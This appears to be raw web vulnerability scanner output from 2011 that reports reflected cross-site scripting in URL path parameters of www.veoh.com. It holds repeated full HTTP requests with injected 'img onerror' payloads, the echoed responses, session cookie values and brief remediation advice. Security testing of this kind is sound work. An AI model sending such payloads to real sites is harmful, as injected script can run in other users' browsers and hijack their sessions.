Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected">
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=35
Content-Length: 94943
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected">
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea>
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 94943
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=33
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected">
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea>
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:58 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected">
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=95
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected">
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=47
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea>
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=14
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=4
Content-Length: 76350
